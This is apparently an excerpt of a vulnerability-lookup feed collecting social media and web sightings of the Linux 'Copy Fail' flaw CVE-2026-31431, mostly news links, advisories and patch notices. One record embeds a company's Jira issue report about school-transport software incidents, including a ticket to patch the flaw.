"CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/philbraun.org/post/3ml2ngwlppc22", "content": "April 8, 2026 - France's Interministerial Directorate for Digital Affairs Switched from Microsoft to Linux\nApril 29, 2026 - CVE-2026-31431 bug is disclosed with capability to get root access on nearly every major Linux distro\nMay 20, 2026 - Bill Gates Buys France to Stop Economic Collapse\n#copyfail", "creation_timestamp": "2026-05-04T21:45:38.113179Z"}, {"uuid": "ba15ab61-677e-40cf-88a3-d17d8c8833e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ytroncal.bsky.social/post/3ml3izdlt4c2w", "content": "CVE-2026-31431: Copy Fail vs. rootless  www.dragonsreach.it/2026/05/04/c...", "creation_timestamp": "2026-05-05T05:59:06.105115Z"}, {"uuid": "50399b73-3349-46b0-a8cf-c32c19615025", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ikkeT.mementomori.social.ap.brid.gy/post/3ml3j7no2ds62", "content": "Red Hat product updates to copy fail available https://access.redhat.com/security/cve/cve-2026-31431\n\n#cve202631431 #CopyFail", "creation_timestamp": "2026-05-05T06:03:27.899508Z"}, {"uuid": "a941cb04-56df-4223-8699-703c2b80511d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hackernewsrobot.bsky.social/post/3ml3ky76ax42y", "content": "CVE-2026-31431: Copy Fail vs. rootless containers", "creation_timestamp": "2026-05-05T06:34:14.564667Z"}, {"uuid": "77296a00-8fbd-47e3-8c82-9d6fd4fe72c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/opsmatters.com/post/3ml36pwp3cc2g", "content": "The latest update for #Tanium includes \"What is a software patch? How it works and why it matters\" and \"Copy Fail (CVE-2026-31431): What #Linux administrators need to know now\".\n \n#cybersecurity #EndpointProtection #EndpointSecurity https://opsmtrs.com/3DH5Ks9", "creation_timestamp": "2026-05-05T02:54:52.229959Z"}, {"uuid": "f53138bc-360e-44d9-b91a-47a26a442d90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/iLUe8v0Uh0Sb6iiHrVVi_18OGPn_eI_21UJtbxqFwUVI_uE", "content": "", "creation_timestamp": "2026-05-05T03:00:05.000000Z"}, {"uuid": "2e233c0f-1eda-4b4f-baa5-1c137ca83280", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/camorabug.com/post/3ml3xig5ipk2t", "content": "Microsoft warns of high-severity Linux privilege escalation\u00a0flaw\n\nA new Microsoft warning says Copy Fail could increase risks for Kubernetes, CI/CD, and shared Linux workloads. Microsoft Defender has warned that CVE-2026-31431, also known as \u2018Copy Fail\u2018, is a high-severity local privilege\u2026", "creation_timestamp": "2026-05-05T10:18:03.520033Z"}, {"uuid": "8749263d-ebc7-4d3e-b481-fb2b01e020b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/rPnY3cDOMvKcPFRcx6QsxUGiZwWHKwUb91xptawBtUQTSW0", "content": "", "creation_timestamp": "2026-05-04T21:00:04.000000Z"}, {"uuid": "80ca80d5-44c2-4923-ae06-ebfddbcc331a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/0_HRy55XY1gHFnZjznakOF7ZoOcpEYzc0dvtDC6c94sHEnY", "content": "", "creation_timestamp": "2026-05-04T15:00:07.000000Z"}, {"uuid": "3094207f-21de-419c-9377-4fefbdf78de8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/XcvE3DqJ3gfHbHlWBgCF8vzzdw-S4AP1Zm_7A_yYzHhyXEw", "content": "", "creation_timestamp": "2026-05-04T09:00:04.000000Z"}, {"uuid": "e878ab76-6b9c-4b3d-9c4b-b29f01d8f19a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/xOE6u0S4AhmTrHPBDYscPzMv6FpE3fbyPNbn5dJYZfuDoSw", "content": "", "creation_timestamp": "2026-05-04T03:00:05.000000Z"}, {"uuid": "7491549c-eff4-495b-87bb-2427c53674e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/getpacketai.bsky.social/post/3ml3mgvclvd2c", "content": "CISA flags critical Linux privilege escalation bug under active attack. CVE-2026-31431 now on the KEV list\u2014patch your systems immediately.\n\nhttps://thehackernews.com/2026/05/cisa-adds-actively-exploited-linux-root.html\n\n#cybersecurity #infosec", "creation_timestamp": "2026-05-05T07:00:24.772812Z"}, {"uuid": "ef9cb3b7-5698-45cd-b125-3cb72ca7e9ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hn100.bsky.social/post/3ml3bwahx642o", "content": "CVE-2026-31431: Copy Fail vs. rootless containers\n\nDiscussion", "creation_timestamp": "2026-05-05T03:52:06.371029Z"}, {"uuid": "dfeac0d1-be30-4514-aafb-5ecf92216094", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/news.karthihegde.dev/post/3ml3c4k7d4v2t", "content": "CVE-2026-31431: Copy Fail vs. rootless containers\nDiscussion | hackernews | Author: averi", "creation_timestamp": "2026-05-05T03:55:39.111120Z"}, {"uuid": "a11a3aad-d765-40ba-9b96-663f6b461647", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hnws.bsky.social/post/3ml3c4mjmcr2t", "content": "CVE-2026-31431: Copy Fail vs. rootless containers\ncomments \u00b7 posted on 2026.05.04 at 23:43:08 (c=0, p=5)", "creation_timestamp": "2026-05-05T03:55:40.606098Z"}, {"uuid": "7b18b925-adf0-48b4-9b0c-9436236f4a6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hackernewsbot.bsky.social/post/3ml3cejzjvv2r", "content": "CVE-2026-31431: Copy Fail vs. rootless containers | Discussion", "creation_timestamp": "2026-05-05T04:00:04.906235Z"}, {"uuid": "eeb366fa-1cff-4b5b-9888-2da439d3ade9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hnbot.gsuscs.xyz/post/3ml3cf7ds622l", "content": "CVE-2026-31431: Copy Fail vs. rootless containers\n\nhttps://www.dragonsreach.it/2026/05/04/cve-2026-31431-copy-fail-rootless-containers/", "creation_timestamp": "2026-05-05T04:00:28.051988Z"}, {"uuid": "691c5003-0f5e-49a3-ab96-de8cdad19e93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hackernewstop5.bsky.social/post/3ml3ck4uxpv25", "content": "CVE-2026-31431: Copy Fail vs. rootless containers\n\n#HackerNews\n\nhttps://www.dragonsreach.it/2026/05/04/cve-2026-31431-copy-fail-rootless-containers/", "creation_timestamp": "2026-05-05T04:03:12.555934Z"}, {"uuid": "81ce4449-c496-4d23-b8a7-7960d93cabe9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/betterhn20.e-work.xyz/post/3ml3f7a73fr2a", "content": "CVE-2026-31431: Copy Fail vs. rootless containers https://www.dragonsreach.it/2026/05/04/cve-2026-31431-copy-fail-rootless-containers/ (https://news.ycombinator.com/item?id=48017813)", "creation_timestamp": "2026-05-05T04:50:48.203979Z"}, {"uuid": "f33ced5b-bcb6-4c69-b44d-997e095e5154", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/sagalinked.bsky.social/post/3ml3fnq4blf23", "content": "\ud83d\udcf0 CVE-2026-31431: Copy Fail vs. rootless containers\n\n\ud83d\udd17 https://www.dragonsreach.it/2026/05/04/cve-2026-31431-copy-fail-rootless-containers/\n\n#Tech #Dev", "creation_timestamp": "2026-05-05T04:58:54.707744Z"}, {"uuid": "b7971cfc-be54-415f-b0cb-431d1a391e52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/betterhn50.e-work.xyz/post/3ml3hyutibb26", "content": "CVE-2026-31431: Copy Fail vs. rootless containers https://www.dragonsreach.it/2026/05/04/cve-2026-31431-copy-fail-rootless-containers/ (https://news.ycombinator.com/item?id=48017813)", "creation_timestamp": "2026-05-05T05:40:56.005186Z"}, {"uuid": "973bd5de-31e9-4068-bd42-77487f39919b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hendryadrian.bsky.social/post/3ml4jro6tix2d", "content": "Linux kernel flaw CVE-2026-31431 exploited for root access; MOVEit CVE-2026-4670 enables remote breaches; DigiCert revokes 60 certificates after Zhong Stealer exposure; Pentagon advances AI security partnerships. #LinuxSecurity #DataCenter #USA", "creation_timestamp": "2026-05-05T15:45:21.277675Z"}, {"uuid": "9bfcebfb-28cb-41c8-a422-420c19e259f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/picalily.bsky.social/post/3ml4hlv3qls2p", "content": "Does that have the CVE-2026-31431 vulnerability and how easy is the patch?", "creation_timestamp": "2026-05-05T15:06:24.642651Z"}, {"uuid": "e41637fd-a994-40db-96c7-fdf669287f6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/ef-edulog/a5ee4122335571c44ee1ffb6cbb97b4a", "content": "\n\n\n\n\nJira Report \u2014 DO / IM / S2\n\n  :root {\n    --bg: #fff; --bg2: #f5f4ef; --bg3: #ebebeb;\n    --tx: #1a1a1a; --tx2: #666660; --tx3: #999994;\n    --info: #185FA5; --bdr: rgba(0,0,0,0.12); --bdr2: rgba(0,0,0,0.22);\n    --r: 8px; --rl: 12px;\n    --font: -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;\n    --mono: 'SF Mono','Fira Code',monospace;\n  }\n  @media(prefers-color-scheme:dark){\n    :root{--bg:#1e1e1c;--bg2:#2a2a28;--bg3:#333330;--tx:#f0efe8;--tx2:#a8a79f;--tx3:#6e6e68;--info:#85B7EB;--bdr:rgba(255,255,255,0.1);--bdr2:rgba(255,255,255,0.18)}\n  }\n  *{box-sizing:border-box;margin:0;padding:0}\n  body{font-family:var(--font);background:var(--bg);color:var(--tx);padding:24px;max-width:1300px;margin:0 auto}\n  h1{font-size:18px;font-weight:500;margin-bottom:4px}\n  .sub{font-size:12px;color:var(--tx2);margin-bottom:20px}\n  .tabs{display:flex;gap:6px;margin-bottom:1.25rem;flex-wrap:wrap}\n  .tab{padding:5px 13px;border:0.5px solid var(--bdr2);border-radius:var(--r);font-size:13px;cursor:pointer;background:var(--bg);color:var(--tx2)}\n  .tab.active{background:var(--bg2);color:var(--tx);font-weight:500}\n  .tab:hover:not(.active){background:var(--bg2)}\n  .legend{display:flex;gap:14px;flex-wrap:wrap;margin-bottom:1rem;font-size:11px;color:var(--tx2);align-items:center}\n  .li{display:flex;align-items:center;gap:4px}\n  .ld{width:9px;height:9px;border-radius:2px}\n  .summary-grid{display:grid;grid-template-columns:repeat(3,minmax(0,1fr));gap:8px;margin-bottom:1.25rem}\n  .metric{background:var(--bg2);border-radius:var(--r);padding:10px 12px}\n  .ml{font-size:11px;color:var(--tx2);margin-bottom:3px}\n  .mv{font-size:20px;font-weight:500}\n  .project-block{margin-bottom:1.1rem;border:0.5px solid var(--bdr);border-radius:var(--rl);overflow:hidden}\n  .ph{padding:9px 14px;border-bottom:0.5px solid var(--bdr);display:flex;align-items:center;justify-content:space-between}\n  .pn{font-size:13px;font-weight:500}\n  .pm{font-size:11px;color:var(--tx2)}\n  .th{padding:5px 14px;font-size:11px;font-weight:500;color:var(--tx2);background:var(--bg2);display:flex;align-items:center;gap:6px;border-top:0.5px solid var(--bdr)}\n  .tc{background:var(--bg3);color:var(--tx2);padding:1px 6px;border-radius:var(--r);font-size:10px}\n  .cols{display:grid;grid-template-columns:80px 1fr 86px 82px 82px 80px 98px;gap:4px;padding:4px 14px;font-size:10px;color:var(--tx3);background:var(--bg2);border-top:0.5px solid var(--bdr)}\n  .ir{display:grid;grid-template-columns:80px 1fr 86px 82px 82px 80px 98px;gap:4px;padding:6px 14px;align-items:start;border-top:0.5px solid var(--bdr);font-size:11px}\n  .ir.stale{background:rgba(250,238,218,0.3)}\n  .ir.highest{background:rgba(252,235,235,0.35)}\n  .ir.overdue{background:rgba(252,235,235,0.45)}\n  .ir.stale.highest,.ir.stale.overdue{background:rgba(250,220,200,0.45)}\n  @media(prefers-color-scheme:dark){\n    .ir.stale{background:rgba(99,56,6,0.2)}.ir.highest{background:rgba(121,31,31,0.2)}\n    .ir.overdue{background:rgba(121,31,31,0.3)}.ir.stale.highest,.ir.stale.overdue{background:rgba(110,40,6,0.28)}\n  }\n  .ik{color:var(--info);font-size:10px;font-family:var(--mono);white-space:nowrap;text-decoration:none}\n  .ik:hover{text-decoration:underline}\n  .is{color:var(--tx);line-height:1.4;overflow:hidden;display:-webkit-box;-webkit-line-clamp:2;-webkit-box-orient:vertical}\n  .ia{color:var(--tx2);font-size:10px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}\n  .dt{font-size:10px;white-space:nowrap}\n  .upd-ok{color:var(--tx2)}.upd-stale{color:#BA7517;font-weight:500}\n  .due-ok{color:var(--tx2)}.due-over{color:#A32D2D;font-weight:500}\n  .cr{color:var(--tx2)}\n  @media(prefers-color-scheme:dark){.upd-stale{color:#FAC775}.due-over{color:#F7C1C1}}\n  .dot-h{display:inline-block;width:5px;height:5px;border-radius:50%;background:#E24B4A;margin-right:2px;vertical-align:middle}\n  .dot-s{display:inline-block;width:5px;height:5px;border-radius:50%;background:#EF9F27;margin-right:2px;vertical-align:middle}\n  .dot-d{display:inline-block;width:5px;height:5px;border-radius:50%;background:#D85A30;margin-right:2px;vertical-align:middle}\n  .sb{font-size:10px;padding:2px 6px;border-radius:var(--r);text-align:center;white-space:nowrap}\n  .s-ip{background:#FAEEDA;color:#854F0B}.s-td{background:#E1F5EE;color:#0F6E56}\n  .s-oi{background:#FCEBEB;color:#A32D2D}.s-xx{background:var(--bg2);color:var(--tx2)}\n  @media(prefers-color-scheme:dark){\n    .s-ip{background:#633806;color:#FAC775}.s-td{background:#085041;color:#9FE1CB}.s-oi{background:#791F1F;color:#F7C1C1}\n  }\n  .empty{padding:16px;text-align:center;color:var(--tx3);font-size:12px}\n  .footer{font-size:11px;color:var(--tx3);margin-top:24px}\n\n\n\n\nJira Active Issues Report \u2014 DO / IM / S2\n\nGenerated May 05, 2026 at 06:32 PM  \u00b7  Excludes Done, Fixed, Canceled, Deferred  \u00b7  https://karrostech.atlassian.net\n\nLast 24 hrs24\u201348 hrs ago2\u20137 days agoOlder than 7 days\n\n\n  Highest priority\n  Stale \u22655 business days\n  Due date missed\n\n\n\n\n\nDO \u2014 Edulog DevOps\n6\n\nIM \u2014 Incident Management\n2\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                6 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nBug 1\n                    \n\n                      DO-2044\n                      East Allen, IN - RDS Absence codes not saving\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Backlog\n                    \nTask 5\n                    \n\n                      DO-2046\n                      Alamance, NC - Please turn on User Defined Reports\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2043\n                      SharedServices, ON - Student Import module broken\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2042\n                      Client Cancelation for Kuna Joint School District, ID\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2041\n                      Remove the test server - fr-routing-legacy-test  it is no longer needed.\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2040\n                      Remove queuedNotification lambda function when associated NotificationService changes are deployed\n                      \u2014\n                      May 4, '26\n                      May 4, '26\n                      \u2014\n                      Backlog\n                    \n            \n\n              \n\n                IM \u2014 Incident Management\n                2 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nStory 2\n                    \n\n                      IM-7571\n                      Cleveland, OH - Client Reported Delays in Both Telematics and with Parent Portal Messages this Morning\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7569\n                      Zonar - Delay / Omission of pings to SM, PP\n                      Nick Sundberg\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n\n\n\nDO \u2014 Edulog DevOps\n4\n\nIM \u2014 Incident Management\n0\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                4 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nBug 2\n                    \n\n                      DO-2034\n                      DP V2 (build 180/AV1): EDP gateway /v4.0/vehicles/search returns 0 vehicles for development-test-school tenant\n                      \u2014\n                      May 3, '26\n                      May 3, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2033\n                      DP V2 (build 180/AV1): POST /apilive/setting/event/add returns 500 after login (tenantId='', deviceId=0)\n                      \u2014\n                      May 3, '26\n                      May 3, '26\n                      \u2014\n                      Backlog\n                    \nStory 1\n                    \n\n                      DO-2035\n                      Johnston, NC - unable to access Driver Portal web\n                      Brandon Donnelson\n                      May 4, '26\n                      May 5, '26\n                      \u2014\n                      Backlog\n                    \nTask 1\n                    \n\n                      DO-2037\n                      Deploy Hafeez's Data Build Tool\n                      Boluwatife Olaifa\n                      May 4, '26\n                      May 4, '26\n                      May 4, '26\n                      Backlog\n                    \n\n\n\nDO \u2014 Edulog DevOps\n7\n\nIM \u2014 Incident Management\n15\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                7 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nStory 1\n                    \n\n                      DO-2025\n                      Birdville, TX - Please deploy Telematics\n                      Cory Emlen\n                      Apr 29, '26\n                      Apr 30, '26\n                      \u2014\n                      IN PROGRESS\n                    \nTask 6\n                    \n\n                      DO-2032\n                      Need script run on Cobb to remove duplicate locations\n                      Vader\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-2028\n                      All legacy PP ingestions have not run:\n                      Josiah Brown\n                      May 1, '26\n                      May 4, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2027\n                      Patch infra with CopyFail (CVE-2026-31431)\n                      Josiah Brown\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2026\n                      Johnston NC Demo Site down\n                      Vader\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Verification\n                    \n                    \n\n                      DO-2024\n                      Review all deployments, evaluate setting limits\n                      Josiah Brown\n                      Apr 29, '26\n                      Apr 29, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2023\n                      Testing Release Servers\n                      \u2014\n                      Apr 29, '26\n                      Apr 30, '26\n                      \u2014\n                      Backlog\n                    \n            \n\n              \n\n                IM \u2014 Incident Management\n                15 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nStory 15\n                    \n\n                      IM-7567\n                      Fayette County, no bus event update since 4/29\n                      \u2014\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7564\n                      Knox, TN - Gps units not reporting in since yesterday\n                      \u2014\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7563\n                       West Shore - Parent Portal not working\n                      Brandon Donnelson\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7561\n                      Denton, TX - Parent Portal App is not tracking buses\n                      Brandon Donnelson\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7560\n                      Suffolk, call from parent experiencing tracking issues.\n                      Josiah Brown\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7559\n                      New Kent, parent portal not tracking\n                      Brandon Donnelson\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7557\n                      New Hanover, Parent portal  tracking issues\n                      Brandon Donnelson\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7556\n                      Jefferson, parent portal not tracking \n                      Josiah Brown\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7555\n                      Elyria-OH ,Parent Portal App don't track the bus.\n                      Josiah Brown\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7554\n                      Peoria, AZ - Parent Portal Down\n                      Brandon Donnelson\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7553\n                      Stanfield, AZ's Parent Portal is not working as of this morning.  Last reading 4:16am.  \n                      \u2014\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Blocker\n                    \n                    \n\n                      IM-7551\n                      SM Can't Send Messages to PP/PPL\n                      Boluwatife Olaifa\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7550\n                      Cleveland, OH - Not able to track buses - GPS tracking down\n                      Kehinde Metibemu\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7548\n                      Cobb County, GA - Severely Degraded Athena Performance\n                      Brandon Donnelson\n                      Apr 29, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7547\n                      Rochambeau, MD - Busses 203/204 have not had movement in Parent Porta Lite since 7:30 PM on 4/27\n                      Josiah Brown\n                      Apr 29, '26\n                      May 4, '26\n                      \u2014\n                      Open Issue\n                    \n\n\n\nDO \u2014 Edulog DevOps\n50\n\nIM \u2014 Incident Management\n0\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                50 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nATH New site request 1\n                    \n\n                      DO-1787\n                      Elyria, OH - Athena Conversion from Legacy\n                      Cory Emlen\n                      Mar 17, '26\n                      Apr 30, '26\n                      Apr 17, '26\n                      Blocked\n                    \nBug 49\n                    \n\n                      DO-2005\n                      Staging-epic-FR3-eks: Bell Time task creation throws ERROR_LOADING_CONTEXT\n                      Vader\n                      Apr 27, '26\n                      Apr 27, '26 (6d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1905\n                      Parent Portal missing route/vehicle data after EKS 1.34 upgrade \u2014 missed cron sync + Hibernate 6 bug\n                      \u2014\n                      Apr 6, '26\n                      Apr 6, '26 (21d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1855\n                      There is no data available in Route assignment, Live substitution modules of Telematcis for Johnston site\n                      Mide Dickson\n                      Mar 26, '26\n                      Mar 26, '26 (28d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1854\n                      There is no data available in multiple pages like Students, Runs, Routes modules of Routing for Johnston site \n                      Mide Dickson\n                      Mar 26, '26\n                      Mar 26, '26 (28d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1842\n                      EDTA service missing MongoDB JVM args \u2014 broken on 57 production tenants\n                      \u2014\n                      Mar 25, '26\n                      Mar 25, '26 (29d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1801\n                      release-2-fr - Elastic search error displays into log - Unable to search for stop locations\n                      \u2014\n                      Mar 19, '26\n                      Mar 19, '26 (33d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1786\n                      [EastAllen, IN 1.78 Smoke]CA Result CSV \u2013 Export fails for valid dates with 400 Bad Request (invalid page number)\n                      Dane Elwood\n                      Mar 17, '26\n                      Mar 26, '26 (28d)\n                      \u2014\n                      Blocked\n                    \n                    \n\n                      DO-1785\n                      [EastAllen, IN 1.78 Smoke]Vehicles \u2013 Seating Configuration popup shows error \u201cnetwork issues\u201d due to backend API failure\n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1784\n                      [Lake Superior 1.78 Smoke]Time & Attendance module not opening from main dashboard\n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1783\n                      Config API is failing for Time & Attendance module in Collinsville site \n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1782\n                      Several API calls are failed in ultilities --> Employee Import and Queue Priority modules \n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1779\n                      [Cleveland -1.78] [Time & attendance][Absence Record] Data preview is not available\n                      Josiah Brown\n                      Mar 16, '26\n                      Mar 16, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1776\n                      Routes API CORS Blocked & Gateway Timeout on Routes Management Page\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 15, '26 (37d)\n                      \u2014\n                      Verification\n                    \n                    \n\n                      DO-1775\n                      [Chicago-1.78] [Telematics --> Edulog standard reports] - Unable to select date range for AM on time report\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 13, '26 (37d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1768\n                      [moorhead 1.78.0] [Telematics] [Vehicle Plan Error] Front end error for Vehicle on Route Historical view\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 16, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1767\n                      500 Internal Server Error on Athena Routing Screen \u2013 eligibilities API\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 23, '26 (31d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1766\n                      [Helena] API call fails on clicking \"Add New\" Student \n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 23, '26 (31d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1765\n                      Deleting a student without entering any data in Add student form is giving 405 error \n                      Josiah 